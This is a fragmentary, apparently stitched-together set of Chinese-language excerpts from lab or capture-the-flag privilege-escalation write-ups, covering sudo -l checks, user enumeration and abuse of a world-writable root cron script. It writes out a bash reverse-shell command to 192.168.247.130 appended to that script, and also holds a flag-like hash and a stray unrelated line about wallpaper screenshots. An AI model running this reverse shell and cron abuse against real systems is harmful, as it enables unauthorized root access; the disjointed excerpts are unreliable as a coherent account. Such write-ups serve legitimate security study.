这时,我们登录了jehad的账号,这时我们可以输入sudo -l查看目前账号的权限: 3.计划任务、sudo滥用和Python建立反弹shell连接提权 我们没有足够的权限去执行命令,我们可以运用下图的命令来收集靶机的信息 这里我们运用第二个命令来列出所有的用户信息: 这里我们可以看到有许多的用户,目前我们的权限等级太低,所以我们要获取...
接下来就是开启监听,等待任务再次执行shell反弹的五分钟:最终提权成功 66f93d6b2ca96c9ad78a8a9ba0008e99 换一张壁纸截图,矮黑
提权 我首先利用了常规的手工枚举方法我找到了计划任务并且细致查看之后发现他是全局可写并且是root权限那么我将写一个bash命令而后等待连接 Go cat/etc/crontab 写入一个命令 Go echo"/bin/bash -i >& /dev/tcp/192.168.247.130/4443 0>&1">>/etc/script/CleaningScript.sh 本地获得root权限...